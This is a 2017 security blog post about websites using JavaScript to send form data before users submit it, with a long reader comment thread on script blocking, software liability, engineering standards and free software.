Websites Grabbing User-Form Data Before It's Submitted

Websites are sending information prematurely:

…we discovered NaviStone’s code on sites run by Acurian, Quicken Loans, a continuing education center, a clothing store for plus-sized women, and a host of other retailers. Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

This is important because it goes against what people expect:

In yesterday’s report on Acurian Health, University of Washington law professor Ryan Calo told Gizmodo that giving users a “send” or “submit” button, but then sending the entered information regardless of whether the button is pressed or not, clearly violates a user’s expectation of what will happen. Calo said it could violate a federal law against unfair and deceptive practices, as well as laws against deceptive trade practices in California and Massachusetts. A complaint on those grounds, Calo said, “would not be laughed out of court.”

This kind of thing is going to happen more and more, in all sorts of areas of our lives. The Internet of Things is the Internet of sensors, and the Internet of surveillance. We’ve long passed the point where ordinary people have any technical understanding of the different ways networked computers violate their privacy. Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.

Posted on June 29, 2017 at 6:51 AM51 Comments

Comments

Nick June 29, 2017 7:02 AM

So all you do is script up something that fills, but doesn’t post. lots of data.

Clive Robinson June 29, 2017 7:27 AM

As I mentioned the other day about having Javascript disabled, the final nail in the Javascript coffin as far as I was concerned was Google’s auto-compleat.

Other people realy should think about turning Javascript off, when you do quite offten you get “dynamic advert free” browsing and less chance of contracting a nasty dose of malware.

However the pariahs that the marketing industry are, have got alarmed at how their business model gets nuked by turning off Javascript. So they now arrange with site owners not to send the content you are interested in if you have Javascript disabled. Whilst it is annoying, I’ve stopped visiting most Javescript required sites, and somehow I’ve found I don’t miss them.

Bod Dylan's Beanie Cap June 29, 2017 7:29 AM

I know at least one website that is rumored to do this and justifies it on the basis that they use it to catch trolls and other people who violate their TOS using multiple identities. I don’t know that this justification makes it ethically any better but I do think it is important to realize that this practice isn’t always about the ability to monetize data.

matteo June 29, 2017 7:31 AM

i hate this kind of tracking and it’s pervasive.

@Nick
or… navigate with noscript.
anyway i sometimes sent fake (but “valid”) credit card numbers when spammers emailed me to steal info. in this way they have to filter out invalid from valid but can’t be automated.

matteo June 29, 2017 7:35 AM

@Clive Robinson
same here, if it ask for javascript i quit (or i cheat)
for example ebay said with big banner in center “java script needed for this site” and obscured the rest.
you could do nothing.
but i pressed f12 deleted the banner and the site was perfectly working (even search worked).
now they removed this antifeature.
but other websites are doing the same.

anyway everyone should have noscript.

mk- June 29, 2017 7:52 AM

There are valid UX reasons for sending data typed by the user before explicit ‘submit’ action, e.g. autocomplete. Let’s not get paranoid, a lot of data about user’s environment is sent when user merely hit the enter key in URL bar, that’s how the HTTP works.

IMHO we should rather educate people to change their “expectation of what will happen”, rather than fight with javascript. Possibly we can advice using software that blocks suspicious pages from even being opened (Google’s Chrome is doing something like that).

Scott Lewis June 29, 2017 7:56 AM

Mk, there are valid reasons. But the use of that data to build up contact information and send unsolicited email, for example is not a valid reason.

AgentZico June 29, 2017 8:13 AM

Even though I had used and still uses JavaScript, one of the first things I do before surfing on any smart mobile device is to… TURN OFF JAVA SCRIPT of browsers. Its like preventing headaches before they come.
Also, it’s almost always about one thing with those at the other end of data retrieval…MONEY.
If they don’t use it themselves, they sell the data to those who’ll use it.

Rachel June 29, 2017 8:15 AM

Whilst it is annoying, I’ve stopped visiting most Javescript required sites, and somehow I’ve found I don’t miss them

I keep Javascript off but as you say, sometimes it is necessary to use a site and its impossible without it. As mentioned before another reason to cheer Bruce for maintaining a most functional, trim site.
The Ethereum article you probably didn’t read, courtesy of ‘Bloomberg’ I suppose a US rag, had one of the more obnoxious examples of Javascript I’ve experienced for a while. When moving the mouse to scroll down whilst reading, without warning the page would scroll left and right, obscuring the article one was absorbed in and opening large side panels of unnecessary graphic displays. I wondered if it was possible for Bruce to link us to text only versions of such articles but they surely only exist in the one place – anything else being a breach of copyright.

mk- June 29, 2017 8:16 AM

@Scott well is it a real world scenario, the users who type in their personal data, but then change their mind and don’t explicitly submit it? I mean, I wouldn’t care about them when building up my database for sending unsolicited emails 😉

Dr. I. Needtob Athe June 29, 2017 8:19 AM

“But it’s too late. Your email address and phone number have already been sent to a server at “murdoog.com,” which is owned by NaviStone, a company that advertises its ability to unmask anonymous website visitors and figure out their home addresses.”

For what it’s worth, I’ve added these lines to my hosts file:

0.0.0.0 murdoog.com
0.0.0.0 http://www.murdoog.com

Will that help?

Parabarbarian June 29, 2017 9:25 AM

Javascript: Extending user friendly surveillance to every corner of the Internet.

Unfortunately, the popular web development platforms rely heavily on javascript to make their pages look “pretty”. Some to the point that a page will not render without it. This trend will only accelerate as HTML5 becomes more pervasive.

Give a programming language the ability to violate your privacy and someone will pay a programmer to use that power.

For the time being, get Noscript and Privacy Badger. Not perfect but they help.

TimH June 29, 2017 10:07 AM

I was checking out on Sears.com a few days ago and was asked for email address before getting total with shipping. Shipping was prohibitive, so I stopped there, closed the browser. Less than a day later, spam from Sears. Ok, so easy to do the unsubscribe, but the auto-subscribe-to-spam feature was rude, and certainly puts me off buying from them.

On similar note, I’m amazed how few sites allow a purchase as a guest option still. Who wants to set up yet another fsking account just to buy a something?

FXL June 29, 2017 11:22 AM

I implemented a system like this for a marketing company in 2004. Captured email addresses from shopping cart signup pages regardless of the user hitting the submit button and followed up with a reminder email if the user had not made the purchase with in an hour or so.

I’m surprised people are just noticing this now.

Iggy June 29, 2017 12:19 PM

I, too, am grateful to Bruce for keeping his site friendly, clean and elegant.

I’ve used noscript and CCleaner for many years and while I allow as few scripts as possible, it’s not perfect, largely because of me: I sometimes guess which script is ok and sometimes I say “oh the heck with it” and allow some I’d rather not in order to get to the content. But now that I’ve received confirmation of something I’ve suspected has been happening at Amazon for many years–yet another reason I don’t do business there anymore and don’t miss that pseudo-state at all–and it further validates my less is more and fake ID attitude toward data sharing.

Just because I’m paranoid doesn’t mean I’m not being followed.

chris June 29, 2017 12:41 PM

Some time ago in noticed that the Google Password Estimator transmits every key press to show you a nice red or green bar. This estimator is a widget you can add to your site to improve “security”. Maybe it does more good than harm. But I don’t like it.

I hope you never entered a password and thought: ‘Oh. I use that password already for $importantService. I’d better use BatteryHorseStapleCorrect! So they won’t know…’.

CallMeLateForSupper June 29, 2017 12:47 PM

@TimH

There is a bright side re: your sears[dot]com experience: Sears is circling the bankruptcy drain right now. The closing of tons of Sears stores – my local one among them – was in the news (last week?).

Ross Snider June 29, 2017 1:00 PM

This is the ultimate indication that Free Software has failed.

We’re asking for regulatory bodies to please constrain what private companies do with secret code. The problems that immediately become apparent are that regulatory bodies do not understand code. They also do not function in a scalable way that can handle large amounts of code review (anyone on this blog should know how long that takes to do).

Calling for a regulatory body to do this is asking for the companies to regulate themselves.

Here’s a better (more scalable) idea: open companies up to lawsuit if they break expectations, including of privacy but also of security. When a large body of case law has been established, make certain practices (“dark patterns”) illegal and allow the companies and their developers to see fines, revocation of license, and jail time if they break the law (severity, etc accounted for by the justice system and due process).

Mandate that the behavior of systems be inspectable and modifiable by consumers. Allow them to file suite if they feel that they are being mistreated. This isn’t some extreme view, it’s the foundation of our political system.

Clive Robinson June 29, 2017 1:21 PM

@ CallMeLateForSupper,

Sears is circling the bankruptcy drain right now.

Which is bad news re personal information.

This has happened before so we should be aware of it but often we are not.

If a company has an internal sales database, that it has stuffed with what it considers “internal sales notes” never ment to see the outside world… if they become bankrupt that database and everything in it becomes “an asset” for the receivers to sell at maximum value for the creditors. Thus your data and some comments from a sales droid about you that are not complementry because you got upset when they delivered late etc become something to be sold endlessly…

It’s just one of the reasons I don’t do online shopping and prefer to go to a shop and pay cash.

The one time I did try was with Amazon and they so badly screwed things up, I let people know just how bad they can be… And as the took money they have not returned I consider them thieves as well.

R00KIE June 29, 2017 1:43 PM

“Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.”

This is true, governments should step in but the question is do they want to? Can anyone say with a straight face that their government is not eager to spy more on its citizens and control their lives more? A few vulnerable IoT devices and badly coded websites can be handy in collecting some more information on the populace.

There is also the matter that most of the people in power and thus approving the new laws are mostly computer illiterate, we see examples every day, such as the encryption backdoor law ideas, do I need to say more?

albert June 29, 2017 1:59 PM

@Bruce,
“…Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs….”

I agree, but unfortunately, as bad as it was under the former administration, now ‘Government regulation’ need to be moved to my oxymoron list. ‘Government’ likes the data, but the Corporatocracy make money with it, it’s a win/win for them and a lose/lose for us.

@Others,
I thought that there were -valid security- reasons for avoiding Java, not just abuse by corporations.

“When new technology can be abused, it will be abused, and in the shortest possible time.”

Many websites -require- JavaScript to run, like your banks website. If you run Firefox, you can try ‘View, Page Style, No Style’. Old versions of Opera had a single-key Java disable/enable, until they drank Chromium-aid (why would Google ever want to let users do that?).

Class action suits against offending companies is a good idea, but -laws- to do that. We don’t have them yet.

When the corporations and their congressional representatives suffer enough from an insecure system, then things might change.

. .. . .. — ….

Mike Gerwitz June 29, 2017 2:01 PM

This type of thing was discussed back in 2013 when Facebook was doing research on self-censorship by tracking whether users had typed message but didn’t submit them. But they didn’t track the content of the messages:

https://arstechnica.com/business/2013/12/facebook-collects-conducts-research-on-status-updates-you-never-post/

As many other commenters here express concern for: JavaScript programs are just that—programs. Your web browser is downloading and automatically executing untrusted, ephemeral JavaScript without your knowledge or consent. For those looking for more information: I’ve given two talks touching on this in the past two years at LibrePlanet: one details many of the ways that you can be tracked online (and otherwise have your privacy violated), and another touches on the issue as it relates to software freedom. Slides for the former contain numerous references so you can do your own research. The bibliography is available in BibTeX format. I hope some here will find it useful.

Clive Robinson June 29, 2017 2:11 PM

@ Ross Snider,

This is the ultimate indication that Free Software has failed.

NO, it’s a sign that the whole software industry has failed to mature as other markets have done.

You may not be aware of the history of Steam Boilers in the United Kingdom in the Victorian era, but it’s an abject lesson of why the software industry has failed.

The important difference is that When Victorian boilers went wrong things became kinetic and death and injuries were part of that. Where as most software when it gpes wrong only kills you a little bit with the stress hormones hardining your arteries etc.

It was the needless death and destruction from boiler explosions that caused Parliament to act, and regulations were brought in about testing certifying and maintaining boilers. Boiler making moved from being an artisanal craft skill of blacksmiths to what became engineering through the application of the scientific method.

In the UK today it is obvious to any one with eyes to see or ears to listen that the old Victorian turn a blind eye to danger has not gone. In that more than a year ago there were very serious warnings about the fire safety of cladding being put up on tower blocks from senior fire officers, they were totaly ignored. Untill a few days ago a tower block in London went up like a signal fire and many were killed. Only now is it being discovered that of the near 150 towerblocks that have been tested in the past few days 100% of them fail basic fire safety tests with respect to the cladding. This is being politicaly portraied as being unexpected, despite the repeated warnings of experts.

That is despite many many warnings it is only now after so many deaths that the profiteers are scrabbling around and actually paying some notice to what they should have atleast a decade ago. Worse the current UK Prime Minister as Home Office Minister turned a blind eye to all the warnings and she’s pretending it was not on her watch.

The leason from this is that the only way the software industry will cease to be a bunch of mainly incompetent artisans and actually become real engineers is when a large number of people die in one large head line grabbing incident. Untill then profit and blind eyes will rule the day.

The thing about “Free Software” is often but not always the source is available, directly or indirectly, which is realy the Closed -v- Open argument not the Free -v- Payed argument. The Free -v- Payed generally only comes to light by litigation where people ask for compensation and discover they have no rights or standing etc.

The software industry needs to change, people need not only to accept responsability but be capable of acting responsibly. Few current software coders are capable of acting responsibly because they have neither the training nor time to do so. Thus it is more of a managment issue, and for that to change, senior managers need to start seeing the inside of prison cellS for extended periods and have their assets taken away to give compensation. Only then will they behave responsibly and encorage those below them to act responsibly. The downside of course is that many will become unemployed in the process and the fast pace of change will come to a shuddering halt prior to what will seem like a snail like pace for years to come.

It’s something that needs to happen urgently, but won’t till there is a pile of around a hundred corpses with grieving family and friends demanding justice.

Major June 29, 2017 2:51 PM

@Ross

I don’t understand how any of this adds up to “Free Software has failed”. I am running my free operating system, with my free programming languages and free apps like the kick ass mathematics system Sage that beats any paid software that I am familiar with hands down, and nothing is failing me. I even get a ton of free cloud processing. I have never been successfully hit by malware. I realize both paid and unpaid software and services might be collecting data on me so I take countermeasures like not putting confidential code on the cloud, encrypting data and monitoring what goes in and out of my network. Any failure seems like a consumer side problem to me…

I think suing people for my ignorance is an inefficient way of addressing… my ignorance. Anybody paying any attention sees web sites responding to their keystrokes, so obviously they are being processed. Anybody paying any attention knows that companies are extracting as much personal data as possible, so it is quite possible that any entry is being stored. Sure, shame companies for being sneaky. Publicize the issues. But a lawsuit? This is unlikely to benefit anyone but lawyers except in the most egregious cases. By the time a suit is resolved the harm is done and the industry has moved on to new tricks.

And what does this have to do with Free Software? Security and privacy issues occur with both free and proprietary software, but free software, being open source, makes the issues easier to find and to fix. And free software makers have less incentive to cheat and trick their users and less ability to hide what they are doing.

In a world with less and less need for employees and more and more people, we better find some way to satisfy needs for free. Telling programmers who are happy to contribute free code to shove it only serves those that want to squeeze the average Joe dry so they can selfishly thrive.

Major June 29, 2017 5:09 PM

@Clive

Fining or putting somebody in jail for writing flawed software makes as much sense to me as fining authors for bad books or jailing scientists for incorrect results. It certainly is a way to discourage people from writing software, which I don’t think is in anybody’s interest, as it will inevitably reduce innovation and the availability of software. And really, flaws are subjective and technical. People could easily lose cases simply because the court or jury couldn’t keep up. And the cost of successfully defending yourself is punitive in itself.

As a universal principal I think treating software errors as crimes only benefits lawyers and trolls. Market and journalistic/informational forces work well enough to police most types of software as long as users take their share of responsibility. For example: If you know IoT devices are flawed and you still connect them to the net, it’s nobody’s fault but your own. If you know how Facebook operates and you still use it, whose fault is that?

I am proud of the code I write but I am not grandiose enough to think its flawless. Flawless code is incredibly difficult to write. For most uses the cost of perfect code is several orders of magnitude more than the cost of “good enough” code. There are exceptions where the cost is worth paying — life and death situations — but in general I believe the user should be responsible for due diligence. The user should understand the risks and limitations and take the appropriate remedial actions: Backups, care in accessing programs from the internet, noscript, antivirus, network monitoring, encryption, redundancy, etc. all work. I have used computers extensively and despite occasional problems I have never been severely impacted — except through my own error — because I take ultimate responsibility for what I am doing and I am willing to recognize when I am at fault.

albert June 29, 2017 6:03 PM

@Clive,

“…It’s something that needs to happen urgently, but won’t till there is a pile of around a hundred corpses with grieving family and friends demanding justice….”

I certainly hope something is done regarding enforcement of fire regulations in the UK.

Other than the Therac-25 case, I know of no other incident of software failure causing death, but that doesn’t mean none have occurred. The way I see it, we’ve had so many hacking incidents causing ruined lives and billions of dollars in damage, that it would seem that the system needs an overhaul. I know a lawyer who needed two years to recover after her identity was stolen. What are po’ folks to do?

Deaths due to poor software might only affect that particular application or application area, whereas the whole system is broken. I fear we’ve advanced too far, not in technology, but in the frantic race to computerize everything. The vast majority of people don’t really have any idea about how these things work, the ones on their laps or in their pockets, not to mention the ‘black boxes’ hidden in almost everything.

We are in the epoch where abuse of technology has outpaced the advancement of technology. I’m not a futurist, so I won’t speculate.

I’ll leave that to folks like Orwell.
. .. . .. — ….

John Smith June 29, 2017 8:25 PM

@Major:

“Fining or putting somebody in jail for writing flawed software makes as much sense to me as fining authors for bad books or jailing scientists for incorrect results. It certainly is a way to discourage people from writing software…”

Those that can be discouraged, should be discouraged.

tyr June 29, 2017 8:53 PM

I’m kinda bwmused by the idea of users
due diligence when it’s fairly obvious
that most have no clue about what is
in control of some part of their lives
through software. If you ride in an
aircraft are you a user. If you drive a
car through a modern highway system
are you a user. Most of the modern
world is an interlocking mess of poorly
understood software and hardware of
which the interNet is a minor case in
the wormcan we have built. I have
worked with competent and trying to
be responsible programmers who were
able to create barely mitigated kinds
of disasters for other people because
of their school training which did
not include any moral training as to
how far their responsibility to others
extended. Expecting every layman to be
the one who has to become a highly
trained expert who vets everything in
their life is impossible to attain.

Blaming the end user for a broken way
of a culture will not fix any problem
caused by dangerous software practices
instituted by bean counter nitwits.

James June 29, 2017 9:46 PM

“Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.”

It would be very unfortunate if the best or only hope for improvement was for the decision makers in the government to put what is good for everyone ahead of their own interests. We see (and expect) decision makers in the private sector to focus on their own interests without regard to what is good for everyone else. I doubt that decision makers in the public sector will behave much better.

In any case I don’t see how regulation can be an effective solution. Banks, for example, are highly regulated compared to other industries. Banks sometimes apply fees and penalties in error. If the account holder points out the mistake, the bank will nearly always correct the error but sometimes they do not. When the bank refuses to correct an erroneous bad check fee after multiple requests, the customer’s best recourse is not to call some regulator. The best course of action is to change banks.

Ross Snider June 29, 2017 11:05 PM

@Major

“Free” = Libre, not Gratis

Free Software != Open Source Software. Common misconception.

Free Software means that software is shared and traded between people, and that at all times the software’s behavior is inspectable and modifiable and that these changes can in turn be published, inspected and modified.

The current industry is so far from this that the prescribed solution by Schneier is for there to be centralized regulation by a body that clearly will never know how perform code reviews. If you’ve ever worked in the software industry (I hope those commenting on the blog have), the regulation for the industry today is close to a joke. The standard industry practice is to create evidence that certain properties of the software are true and asserted to auditors, but the auditors are in general not enabled to actually discover the properties of the subjects that they are auditing. The auditors do not understand code or networking, they have a checklist of things that they must be convinced of and the industry hires some people to become convinced of it and in turn convince the auditors.

In my tour in the industry I’ve seen every compliance professional who has loudly proclaimed, with evidence, that we are not yet compliant with regulations quietly retire with a severence package. Every single one. Try convincing your software company that it isn’t compliant with an important standards or some regulation and won’t be without years and millions of dollars of investment. (I dare you.) Or, if you want, find your compliance and regulation folk, and try to convince them that it isn’t complaint with an important standard or a regulation (and won’t be without years of work and millions of dollars). Even with a compelling argument, I garuntee you will fail. Your compliance team will find a way to argue that what you have is “good enough”.

I don’t know if Schneier has experienced this himself, but my experience in the industry (multiple Fortune 500s) has led me to understand that regulatory auditors are not sufficiently armed to actually regulate large software companies. They come in as teams of less than a dozen for a week at a time, spend half their time with marketing and management and the other half with parts of the organization that vouch for but do not understand the properties and controls inherent to the product. The auditors leave with promises about the state of the product from people who actually don’t really know any better. Everybody leaves happy.

Within the ideal of Free Software in a market system where companies can be sued by consumers for breaking their privacy and security expectations the outcome looks a hell of a lot different than the diatribe above. And yeah, there’s a bit of hyperbole to calling it “failed”.

Anyway, my recommended solution to this problem is:

1) Free Software culture

2) more transparency on what software is actually doing for customers (opening sourcing, creating “product labels” like we have for food, BBB support for software behavior)

3) A consumer rights push (a la Ralph Nader) on the affect of malicious software practices

4) A real stick on companies: possibility of fines, jail time, market loss

I don’t believe that “regulation” will scale. At least, not if it is of the kind where auditors come in with a checklist.

Clive Robinson June 30, 2017 2:50 AM

@ Major,

Fining or putting somebody in jail for writing flawed software makes as much sense to me as fining authors for bad books or jailing scientists for incorrect results

The law is in essence about “harms” both in remedying and less so to prevention. Harms caused to an individual or groups are normaly considered criminal conduct, those of contracts and torts civil. In the former case custodial sentencing is the norm with asset seizure fining being part of the remedy. Civil cases is mainly about fines.

As I pointed out I was talking about the inevitable case of harms against the person, which would be subject to criminal sanctions, thus custodial sentencing.

Currently we have a problem in that governments consider large fines against corporates as a way to rise revenue, thus Corporate Liability by individual Officers is lost and as we have seen with the banks it just becomes a game of chance where those making profit thus large bonuses do not change their risk seeking behaviour. This is not what you want to happen in an industry which is just about to launch into a phase where lives will most definitely be at risk with autonomous vehicles.

The simple fact that you appear to be ignoring is that in all other engineering domains engineers understand both risk and responsability, their behaviour is most definitly not artisanal. Because there are vast piles of legislation on safety and function with similar quantities of internationaly agreed standards that have to be explicitly complied with.

As we have seen there are no real software standards that effect final product functionality they are at best discretionary and generaly only come up with interoperability issues. Worse many major software houses have and still see standards such as file formats as a way to achive “lock-in” and thus change them with every release to stop products from other organisations working or as the execs see it “infringing”. This is not a route to stability and efficient working and in fact ends up harming the practicing organisations themselves as their own software core has to be endlessly reworked thus adding more bugs and vulnerabilities harming their own product and reputation. Microsoft appears to have realised this and mostly keeps it’s lock-in behaviour at the UI these days which means the core tends to become stable (hence the XP problem we are debating about currently on another thread).

The point is that untill there are real compliance standards with real enforcability software will be “Art” not “Science” produced by the equivalent of marketing copy writers not engineers. If you can live with that in your self driving car or medical implant, ask your relatives if they could?

As far ad I am concerned many “Software engineers” are committing a fraud, they are not nor can many of them ever be engineers in the meaning of “engineering disciplines”.

Bong-Smoking Primitive Monkey-Brained Spook June 30, 2017 3:37 AM

@Clive Robinson,

they are not nor can many of them ever be engineers in the meaning of “engineering disciplines”.

Not surprising! When I was in college in the Electrictrical Engineering program, students who failed the program transferred to the computer science department and became “A” students. Those who failed computer science went to Software Engineeting (new despline at the time) and made it 🙂

Nothing against computer scientists or software engineers. Our brains are wired differently. Case closed.

Dan H June 30, 2017 7:04 AM

“Those who failed computer science went to Software Engineering”

I recall a lawsuit over a decade ago against everyone calling themselves engineers. There were sanitation engineers (janitors), domestic engineers (moms), everyone had to be an engineer. The courts found that being an engineer was a professional designation that required a proper education, licensing, etc., but they couldn’t prevent mom from calling herself a domestic engineer if she chose to do so.

Today we still have engineers. MCSE. Microsoft Certified Systems Engineer. Although one doesn’t even need to attend a technical college to become an “engineer.”

The same is true with software engineers. Rarely is someone called a computer programmer, but they’re a software “engineer.” I do realize there is a difference in one just “codes” and the other “architects.” Yet there are estimates that 40% of software professionals don’t have a college degree (I’d guess it is higher). If you are going to be an “architect,” shouldn’t there be a formal education and licensing? Not everyone can design a new high rise building without going to college.

Perhaps if there was a formal software engineering discipline in the same aspect of electrical engineering and required people to have a degree and become licensed, and take continuing education, there would be more secure software. This will never happen and everyone will continue being an MCSE and software engineer.

Major June 30, 2017 12:45 PM

@Ross (and to some extent @Clive)

Yes, I was thinking of free as “libre”. I do not see any significant difference between “libre” as you describe it and what is generally called “open source”.

I worked as a consultant for years and have been through many companies’ code. Not so shockingly, the code all had flaws, most of which did not significantly harm its usefulness.

Programming in general is artisanal, at least at this point in its development. It is a very young field. Real time systems in critical applications need to be pure engineering, and probably boring and far from artisanal. Which is fine, but it is artisanal programmers who invent the verifiable languages, the proofs, and the static and dynamic analysis tools that allow real time systems to be created safely. The edge is going to be artisanal. When it is well understood and boring compliance engineers can take it over while creative programmers move on to the next edge.

Really what is engineering except utilization of science once the science has been well understood?

I really don’t follow your argument. You seem to be describing the uselessness of all the regulation and auditing you have experienced while at the same time recommending more. I am not saying that fraud or deception should not be punishable, but holding software developers to unrealistic and largely inefficient standards despite the fact that they readily admit that their code is not perfect is just silly make believe that can do nothing more than stunt the industry and effectively stunt the progress of every field that uses computers. The first versions of anything interesting will have significant flaws. No flaws means no innovation.

And really I would like to see a set of unambiguous standards that ensure that code is secure or accurate. Standards that actually can be reliably applied and whose application can be verified. And who would determine these standards are correct?
Ultimately politicians or bureaucrats who know nothing about the subject, no?

Reasoning about programs in incomplete a la Turing, so I doubt standards could do more then specify that a certain number of hours or employees need to be applied to testing, which we all should know proves nothing.

As far as privacy goes: We can’t get people to stop using applications that THEY KNOW don’t respect their privacy. If people don’t take responsibility for their own privacy it seems hypocritical to me for them to complain. And even more ludicrous for them to press charges. Somebody who dances in a dark road blindfolded and dressed in black has little cause to sue that car that hits them.

ab praeceptis June 30, 2017 1:22 PM

Clive Robinson, Bong-Smoking Primitive Monkey-Brained Spook

I’ll keep this short so as to stay well below my trigger level (reaching it, I would have to get a good assault rifle and lots of ammo to clean at least our region from all the ‘ux engineers’, ‘web dev. engineers’, and lots of other dangerously incompetent and often imbecile creatures).

Let me correct you with at least one example, myself, and restore some honour that – granted, often justifiedly – was lost. Doing electronics since I was 10 or so (some might remember the Philipps electronics kits, one of which I got because it was hoped to keep me busy *g) I finally ended up as a software engineer. By coincidence, btw., but it was only possible because that field held promises electronics couldn’t deliver anymore by then.

I think the decisive difference isn’t hardware vs software but two factors: a) a way of thinking and b) a hands on desire. And the way of thinking must understand, value, and be based on math. Another attribute I usually noted with good engineers is that they have efforts vs. gain in mind as well as an unwillingness to make foul compromises.

If pressed to boil it all down to 1 single point, I’d say that an engineer thinks in terms of a system, a part of which will be what he creates, hence (s)he will always look carefully at the context.

Finally, I’d like to somewhat defend our many, many lost sheep colleagues out there: The quality of the engineers of a society is much bounded by the educational system and self-understanding of that society. With usually lousy universities and in dumbed down pure consumer societies, oh well …

mutley dastardly June 30, 2017 2:10 PM

I’m looking for blacklists, to import into my webwall.
Let’s just get rid of those incorrect websites – privacy and the right to be wrong, and the right to correct those postings – is too expensive to leave it to lawyers.

Clive Robinson June 30, 2017 2:41 PM

@ Major,

And who would determine these standards are correct?
Ultimately politicians or bureaucrats who know nothing about the subject, no?

I can’t answer for the peculiar US standards systems, as the ones I’ve had to deal with are mainly “arse about face” and often show that there is bad political patronage at the senior levels setting direction (see the latest from the EPA on climate change to see the lunacy of this process).

In Europe and the UN standards are generaly set in three steps first identified by the British Standards Institute a very long time ago.

They work with both industry and politicians in a back and forth manner to establish if there is a requirment for a national or international standard. They likewise work with industry bodies who feel their standards could likewise benift the nation or nations, but further down the line.

When a need is recognised they propose a framework if the standard is to be part of legislation. The legislators then draw up the framework in leagal form and put it through the legislative process. The chosen standards body then assembles a team of experts usually from the interested industries and an administrative technical lead reporter/secretary who is from the standatds organisation and acts as an expert secratary and editor. The technical experts draw up requirments and work their way through tying where possible to existing standards usually in the area of metrology (science of measurment). Politicians have no input at this level thus interferance is usually minimal. When the standard reaches an appropriate state of agreement it is put up as a draft for comment. Sometimes this part of the process may cause major changes in which a nrw draft will be drawn up. Eventually the standard gets voted upon and if it passes this it becomes a formal standard.

Larger intetnational standards bodies do have political input via technical representatives at the highest levels especially when dealing with a shared resource like the Electromagnetic Spectrum and communications and similar interfaces between national standards (think old phones as an example). These generaly don’t happen that often hence the probs at the last ITU gathering, the Internet had happened in between and various Govs wanted to carve things up in different ways amongst much animosity.

In general though non use standards are less prescriptive, that is they will say “less than x parts per million” where as US standards have a habit of saying “Using test procedure XYZ test for less than x parts per million” and that gets enshrined in legislation. Which is realy not a sensible way to go about things if you take the long view because it’s too rigid and quickly becomes out of date or outmoded in other ways and extrodinarily slow to change as well as opening up opportunities for legislators to abuse the process in various ways…

But software is a major issue, it has no real existing standards outside of language definitions. This is because there is effectively no existing measurands that can be used to check against.

Thus we are in danger of getting standards by case law which is most definitely not the way we want to go as it’s liability/blame driven after a harm. Which involves a court determining the “Golden Thread” to establish “Reasonable Behaviour” which in turn means establishing a “Directing Mind” and forensic analysis which is very bad news. As forensics basic premise is the reverse of that of science as it goes backwards in time and is mainly untestable, and usually not repeatable.

That is forensic practitioners argue backwards from a known effect to what the lawyers and experts agree is the probable cause based only on opinion which history shows is frequently wrong. Science almost always goes from cause to effect as that is reliably testable as it moves forward in time and importantly is repeatable.

Anon June 30, 2017 3:20 PM

@Major

Reasoning about programs in incomplete a la Turing, so I doubt standards could do more then specify that a certain number of hours or employees need to be applied to testing, which we all should know proves nothing.

AARGH.

Turing didn’t say “we can’t decide if a program halts”. He said “we can’t decide if an arbitrary program halts.” There are a great many programs that we can prove will halt. If we depend on a program halting we should write one of those.

In other words use Hoare’s first method of constructing software — Make it so simple that it is obviously correct.

This comes up a lot in code reviews. If the writer cannot convince the reviewer the code is correct the code should be rejected. The reviewer should not be required to produce a test case that demonstrates the code is wrong.

Ross Snider June 30, 2017 3:45 PM

@Major

The difference between Free Software and Open Source is pretty clear, but is also (unfortunately) widely misunderstood. It’s a tangent, so let’s not go into it here. The Free Software Foundation does a good job popularizing the difference: https://fsf.org/

I really don’t follow your argument. You seem to be describing the uselessness of all the regulation and auditing you have experienced while at the same time recommending more.

The recommendation is that market system and justice system forces (post-hoc forces) are brought to bear on the software industry rather than merely ex-ante good faith regulation.

I am not saying that fraud or deception should not be punishable, but holding software developers to unrealistic and largely inefficient standards despite the fact that they readily admit that their code is not perfect is just silly make believe that can do nothing more than stunt the industry and effectively stunt the progress of every field that uses computers. The first versions of anything interesting will have significant flaws. No flaws means no innovation.

Right I would agree with this. No unrealistic or largely inefficient standards. We’re on the same page.

And really I would like to see a set of unambiguous standards that ensure that code is secure or accurate. Standards that actually can be reliably applied and whose application can be verified. And who would determine these standards are correct?
Ultimately politicians or bureaucrats who know nothing about the subject, no?

Right you seem to have an understanding of how ex-ante good faith regulation is going to fail.

As far as I can tell you agree quite completely with all of the recommendations I’ve laid out, but there’s some points of confusion that are (IMO) probably not worth our time trying to clear up.

Georgina June 30, 2017 5:36 PM

Clive,

As I mentioned the other day about having Javascript disabled, the final nail in the Javascript coffin as far as I was concerned was Google’s auto-compleat.

Way back in 2002/2003, I turned off Javascript because of a line of code on google.com that was pure evil: in the onload handler, they’d clear the search textbox. It must have worked fine from Google’s datacenter, but on my slow connection I could have typed half the query before the page was fully loaded and it got cleared. (When I heard about autocomplete I was glad I had JS disabled. That’s exactly the kind of feature I don’t want.)

I was going to check the exact date from the Wayback machine, but sadly the developers have broken it: “The Wayback Machine requires your browser to support JavaScript, please email info@archive.org if you have any questions about this.” I can’t even guess what feature they wanted to add that was so important they broke the non-JS version.

Georgina June 30, 2017 7:08 PM

Only now is it being discovered that of the near 150 towerblocks that have been tested in the past few days 100% of them fail basic fire safety tests with respect to the cladding.

And then there’s the other problem that’s shocking to non-UK people: a single exit stairwell. Other regulators figured this out 150 years ago: “In 1862, the [New York City] law required fire escapes to be retroactively installed on all existing tenements.” Rats, badgers and woodchucks were building secondary escape tunnels from their burrows long before then.

Major June 30, 2017 9:03 PM

@Ross I guess what we had there was a failure to communicate! As far as open source vs Libre goes (I didn’t see anything specific about this following your link) my logic is that Libre requires source to be open. (Libre->OS) And as far as I can see, having source available under a GPL license (at least a recent one) is sufficient for it to Libre. (OS->Libre). Hence OS==Libre.

@Anon I think your point that termination can be proven for some programs is worth remembering but hardly worth an AARGH since it is trivially true and obvious. Someone who understands Turing theory at all would know that. Agda is an interesting language that only allows terminating programs to be written (with provisos) and it couldn’t hurt to use such a language if termination was essential. But I’d say that functional and security properties are harder to prove than termination of a program written under limitations that enforce termination. Many properties can be translated to termination conditions under transformed programs but proving that those transformed programs terminate is harder than writing ones that you know do.

